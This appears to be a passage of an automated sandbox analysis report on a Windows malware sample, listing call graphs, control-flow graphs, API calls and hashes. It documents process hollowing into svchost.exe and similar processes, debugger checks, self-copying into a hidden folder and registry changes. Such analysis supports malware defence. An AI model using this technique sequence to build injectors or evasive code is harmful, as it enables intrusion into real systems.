CloseHandle 1359->1361 1362 7ff63a834918 1360->1362 1363 7ff63a8348f0 GetProcessHeap HeapFree CloseHandle 1360->1363 1361->1358 1364 7ff63a834931 GetProcessHeap HeapFree CloseHandle 1362->1364 1365 7ff63a834959 1362->1365 1363->1358 1364->1358 1366 7ff63a834b03 GetProcessHeap HeapFree CloseHandle 1365->1366 1367 7ff63a834a14 GetProcessHeap HeapAlloc 1365->1367 1368 7ff63a834a61 1365->1368 1366->1358 1367->1368 1368->1366 1369 7ff63a832fe0 1374 7ff63a832fe9 1369->1374 1370 7ff63a8330d5 1373 7ff63a833b28 RegDeleteKeyW 1373->1374 1374->1370 1374->1373 1375 7ff63a833d28 9 API calls 1374->1375 1376 7ff63a8338b8 3 API calls 1374->1376 1378 7ff63a8344c8 CreateFileW 1374->1378 1383 7ff63a833a88 RegOpenKeyExW 1374->1383 1375->1374 1377 7ff63a8330c5 Sleep 1376->1377 1377->1374 1379 7ff63a83455e 1378->1379 1380 7ff63a834523 1378->1380 1379->1374 1386 7ff63a834448 SetFilePointer WriteFile SetEndOfFile 1380->1386 1382 7ff63a83453f SetFileAttributesW CloseHandle 1382->1379 1384 7ff63a833b16 1383->1384 1385 7ff63a833adc RegSetValueExW RegCloseKey 1383->1385 1384->1374 1385->1384 1386->1382 1387 7ff63a8349bf 1390 7ff63a8349cf 1387->1390 1388 7ff63a834b03 GetProcessHeap HeapFree CloseHandle 1389 7ff63a834b29 1388->1389 1390->1388 1391 7ff63a834a14 GetProcessHeap HeapAlloc 1390->1391 1392 7ff63a834a61 1390->1392 1391->1392 1392->1388

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                                    callgraph 0 Function_00007FF63A8337C8 3 Function_00007FF63A833648 0->3 1 Function_00007FF63A8344C8 4 Function_00007FF63A834448 1->4 2 Function_00007FF63A833FC8 29 Function_00007FF63A833F08 2->29 50 Function_00007FF63A833618 3->50 5 Function_00007FF63A831ECC 6 Function_00007FF63A8329CC 13 Function_00007FF63A8328BC 6->13 7 Function_00007FF63A831F4C 8 Function_00007FF63A832ED0 8->2 15 Function_00007FF63A833FE8 8->15 18 Function_00007FF63A833B68 8->18 54 Function_00007FF63A831C20 8->54 9 Function_00007FF63A831050 10 Function_00007FF63A8332D0 32 Function_00007FF63A831F8C 10->32 11 Function_00007FF63A8338B8 12 Function_00007FF63A8343B8 28 Function_00007FF63A834308 12->28 14 Function_00007FF63A8349BF 37 Function_00007FF63A834578 14->37 51 Function_00007FF63A834798 14->51 38 Function_00007FF63A832BFC 15->38 16 Function_00007FF63A833BE8 17 Function_00007FF63A834168 23 Function_00007FF63A833A58 17->23 42 Function_00007FF63A833A28 17->42 19 Function_00007FF63A8335F0 20 Function_00007FF63A8330F0 22 Function_00007FF63A832F70 20->22 21 Function_00007FF63A8332F0 47 Function_00007FF63A832E30 22->47 24 Function_00007FF63A8335DC 25 Function_00007FF63A832FE0 25->1 25->11 30 Function_00007FF63A833A88 25->30 43 Function_00007FF63A833B28 25->43 44 Function_00007FF63A833D28 25->44 26 Function_00007FF63A833360 26->16 26->17 26->21 35 Function_00007FF63A833210 26->35 36 Function_00007FF63A833978 26->36 41 Function_00007FF63A833180 26->41 45 Function_00007FF63A8342A8 26->45 49 Function_00007FF63A833E18 26->49 52 Function_00007FF63A8310A0 26->52 53 Function_00007FF63A833120 26->53 27 Function_00007FF63A834808 27->37 27->51 28->23 31 Function_00007FF63A831F0C 32->5 32->7 32->31 33 Function_00007FF63A83350D 34 Function_00007FF63A833290 34->32 35->0 35->2 35->15 35->18 35->54 36->0 36->3 36->11 38->6 39 Function_00007FF63A831000 40 Function_00007FF63A833600 41->0 41->12 46 Function_00007FF63A8332B0 46->32 48 Function_00007FF63A832DB0 48->0 48->27 52->9 52->39 55 Function_00007FF63A8334A1

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF63A831F8C Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 217 7ff63a831f8c-7ff63a832006 GetModuleFileNameW 218 7ff63a832008 217->218 219 7ff63a83200d-7ff63a832049 217->219 220 7ff63a8328b1-7ff63a8328b9 218->220 221 7ff63a83204b-7ff63a832053 219->221 222 7ff63a832061-7ff63a83207d call 7ff63a831ecc 219->222 223 7ff63a83207f-7ff63a83209b call 7ff63a831f0c 221->223 224 7ff63a832055-7ff63a83205d 221->224 231 7ff63a8320c0-7ff63a8320ca 222->231 223->231 226 7ff63a83209d-7ff63a8320b9 call 7ff63a831f4c 224->226 227 7ff63a83205f-7ff63a8320bb 224->227 226->231 227->220 235 7ff63a8320cc 231->235 236 7ff63a8320d1-7ff63a832125 CreateProcessW 231->236 235->220 237 7ff63a832127 236->237 238 7ff63a83212c-7ff63a83216c CreateFileW 236->238 237->220 239 7ff63a83216e 238->239 240 7ff63a832173-7ff63a83218f GetFileSize 238->240 239->220 241 7ff63a83219b-7ff63a8321a6 CloseHandle 240->241 242 7ff63a832191-7ff63a832199 240->242 241->220 242->241 243 7ff63a8321ab-7ff63a8321d3 VirtualAlloc 242->243 244 7ff63a8321e5-7ff63a832210 ReadFile 243->244 245 7ff63a8321d5-7ff63a8321e0 CloseHandle 243->245 246 7ff63a832235-7ff63a832283 CloseHandle GetThreadContext 244->246 247 7ff63a832212-7ff63a832230 VirtualFree CloseHandle 244->247 245->220 248 7ff63a83229d-7ff63a832322 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 246->248 249 7ff63a832285-7ff63a832298 VirtualFree 246->249 247->220 250 7ff63a83233c-7ff63a8323a5 VirtualAllocEx 248->250 251 7ff63a832324-7ff63a832337 VirtualFree 248->251 249->220 252 7ff63a8323a7-7ff63a8323ba VirtualFree 250->252 253 7ff63a8323bf-7ff63a8323f3 WriteProcessMemory 250->253 251->220 252->220 254 7ff63a83240d-7ff63a832418 253->254 255 7ff63a8323f5-7ff63a832408 VirtualFree 253->255 256 7ff63a83242a-7ff63a83243d 254->256 255->220 257 7ff63a8324eb-7ff63a832532 256->257 258 7ff63a832443-7ff63a8324cc WriteProcessMemory 256->258 261 7ff63a832544-7ff63a832557 257->261 259 7ff63a8324e6 258->259 260 7ff63a8324ce-7ff63a8324e1 VirtualFree 258->260 259->256 260->220 263 7ff63a8327dc-7ff63a832860 WriteProcessMemory SetThreadContext 261->263 264 7ff63a83255d-7ff63a8325ac RtlCompareMemory 261->264 265 7ff63a832877-7ff63a832887 ResumeThread 263->265 266 7ff63a832862-7ff63a832875 VirtualFree 263->266 267 7ff63a8325b0-7ff63a8325d9 264->267 268 7ff63a8325ae 264->268 270 7ff63a832889-7ff63a83289c VirtualFree 265->270 271 7ff63a83289e-7ff63a8328ab VirtualFree 265->271 266->220 272 7ff63a8325e4-7ff63a8325f2 267->272 268->261 270->220 271->220 273 7ff63a8325f8-7ff63a832683 272->273 274 7ff63a8327d7 272->274 275 7ff63a832695-7ff63a8326a3 273->275 274->263 276 7ff63a8326a9-7ff63a8326dc 275->276 277 7ff63a8327d2 275->277 278 7ff63a8326e0-7ff63a8327b3 ReadProcessMemory WriteProcessMemory 276->278 279 7ff63a8326de 276->279 277->272 281 7ff63a8327cd 278->281 282 7ff63a8327b5-7ff63a8327c8 VirtualFree 278->282 279->275 281->277 282->220
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                                    • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                                    • Opcode ID: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction ID: 0a1ab66c9af3223c083130d857e33b8c803bfb6dfb86d77cb3b16e7d40fa14b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A32E93A60CAC586E774CB15E8547AAB3A1FBD9B44F004175DACE87B98EF7CD444AB00
                                                                                                                                                                                                                                                    Function 00007FF63A833360 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 283 7ff63a833360-7ff63a833376 call 7ff63a8310a0 call 7ff63a833120 288 7ff63a833378-7ff63a83337a ExitProcess 283->288 289 7ff63a833380-7ff63a8333ae call 7ff63a834168 call 7ff63a833be8 call 7ff63a833e18 283->289 296 7ff63a8333b0-7ff63a8333c1 call 7ff63a8342a8 289->296 297 7ff63a8333ff-7ff63a833412 call 7ff63a833e18 289->297 302 7ff63a8333d6-7ff63a8333d8 ExitProcess 296->302 303 7ff63a8333c3-7ff63a8333d4 call 7ff63a8342a8 296->303 304 7ff63a833450-7ff63a833463 call 7ff63a833e18 297->304 305 7ff63a833414-7ff63a833425 call 7ff63a8342a8 297->305 303->302 312 7ff63a8333de call 7ff63a833210 303->312 313 7ff63a8334a6-7ff63a8334bc call 7ff63a833978 call 7ff63a8332f0 304->313 314 7ff63a833465-7ff63a833476 call 7ff63a8342a8 304->314 315 7ff63a833427-7ff63a833429 ExitProcess 305->315 316 7ff63a83342f call 7ff63a833180 305->316 323 7ff63a8333e3-7ff63a8333e8 312->323 334 7ff63a8334be-7ff63a8334cf call 7ff63a8342a8 313->334 335 7ff63a833512-7ff63a8335d4 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 313->335 330 7ff63a833478-7ff63a83347a ExitProcess 314->330 331 7ff63a833480 call 7ff63a833180 314->331 321 7ff63a833434-7ff63a833439 316->321 325 7ff63a833448-7ff63a83344a ExitProcess 321->325 326 7ff63a83343b-7ff63a833446 Sleep 321->326 328 7ff63a8333f7-7ff63a8333f9 ExitProcess 323->328 329 7ff63a8333ea-7ff63a8333f5 Sleep 323->329 326->321 329->323 336 7ff63a833485-7ff63a83348a 331->336 341 7ff63a8334d1-7ff63a8334e2 call 7ff63a8342a8 334->341 342 7ff63a8334e4-7ff63a8334e6 ExitProcess 334->342 338 7ff63a833499-7ff63a83349b ExitProcess 336->338 339 7ff63a83348c-7ff63a833497 Sleep 336->339 339->336 341->342 345 7ff63a8334ec call 7ff63a833210 341->345 347 7ff63a8334f1-7ff63a8334f6 345->347 348 7ff63a8334f8-7ff63a833503 Sleep 347->348 349 7ff63a833505-7ff63a833507 ExitProcess 347->349 348->347
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_VznLpbPuTg$worker_VznLpbPuTg$worker_ZLpjbmHstE$worker_pPCJtqmKMc
                                                                                                                                                                                                                                                    • API String ID: 613740775-1274706621
                                                                                                                                                                                                                                                    • Opcode ID: 59c45464f771be6ff5eec6c028a7fa3e660507d852d3508378b87ba2b614c531
                                                                                                                                                                                                                                                    • Instruction ID: 50dde9d646064474310dc8a0f32750fd22255cb32a6957f806ea98ae31bdc8bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59c45464f771be6ff5eec6c028a7fa3e660507d852d3508378b87ba2b614c531
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B961192DA1CA4391FBA4AB31EC552BE2260FF91301F4445B5E9CED67E5DE3DE409B600
                                                                                                                                                                                                                                                    Function 00007FF63A834168 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 434396405-0
                                                                                                                                                                                                                                                    • Opcode ID: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction ID: b1273d7ef1c2ef179a448075fb1880c16045b35c8fde93fe8010ed6dca6572af
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8231033AA1CA8186E750CB55E85072AB7A0FBD5B81F105075FACE83BA8DF7CD441AF00
                                                                                                                                                                                                                                                    Function 00007FF63A833120 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3920101602-0
                                                                                                                                                                                                                                                    • Opcode ID: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction ID: 6d69b0f1f118b9f65d4ee19c2517539c8ba4364165c3b89558da43dda09fd91a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F0D42D90C28281EA319B69AC0436E67A0EB46B48F4801F4EACD867D5CF7CD609BB11
                                                                                                                                                                                                                                                    Function 00007FF63A831050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 408 7ff63a831050-7ff63a83108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF63A831165,?,?,?,?,?,?,00007FF63A83336C), ref: 00007FF63A831063
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF63A831165,?,?,?,?,?,?,00007FF63A83336C), ref: 00007FF63A831078
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                                    • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction ID: 82ead8e6a5c3e39bcd7e2c476c7f40121096705d43ea9eba84cda14b26868ddf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61E0927A908F8486C660DB15F89001AB7B4FBC9794F504125EACD82B28DF3CC165DB00
                                                                                                                                                                                                                                                    Function 00007FF63A8337C8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF63A833688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833648: GetVolumeInformationW.KERNELBASE ref: 00007FF63A833705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833648: wsprintfW.USER32 ref: 00007FF63A8337A6
                                                                                                                                                                                                                                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833811
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833826
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833839
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833849
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A83385C
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833871
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833884
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833899
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: .exe
                                                                                                                                                                                                                                                    • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                                    • Opcode ID: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction ID: 36af8a8a624dbc3f6b84bba65c8fbac6ca8f82a39a795145d69dd0d8d048d42b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 394754d39533e2b7955e5e4960e6c7924f9d2ad5806592b2d3c7930fbbf7790f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0911123DA2A98299DB659B26FC9476A6331FFC4780F405071DACE83B69DE3DD448E700
                                                                                                                                                                                                                                                    Function 00007FF63A833978 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF63A833688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833648: GetVolumeInformationW.KERNELBASE ref: 00007FF63A833705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A833648: wsprintfW.USER32 ref: 00007FF63A8337A6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833811
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833826
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833839
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833849
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A83385C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833871
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833884
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF63A8337C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63A8339AD), ref: 00007FF63A833899
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32 ref: 00007FF63A8339BD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE ref: 00007FF63A8339C8
                                                                                                                                                                                                                                                    • CopyFileW.KERNELBASE ref: 00007FF63A8339E1
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE ref: 00007FF63A8339F9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817146466.00007FF63A837000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff63a830000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: Services
                                                                                                                                                                                                                                                    • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                                    • Opcode ID: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction ID: e783459866b9c87f30c6c6f289ef0e8a40fa55693b07a7afb7b5138031004beb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5f45a330b346b5a18c04901060aca7385ba15bdd6f6fdd8f78c01ad9e797b65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201846DE19586A6EB50DB24EC513AA5360FB84744F805472D38DC27E4EE3DD20DFB00
                                                                                                                                                                                                                                                    Function 00007FF63A833648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1817098264.00007FF63A831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF63A830000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817069061.00007FF63A830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1817126031.00007FF63A835000.00000002.00000001.01000000.00000003.sdmpDownload File
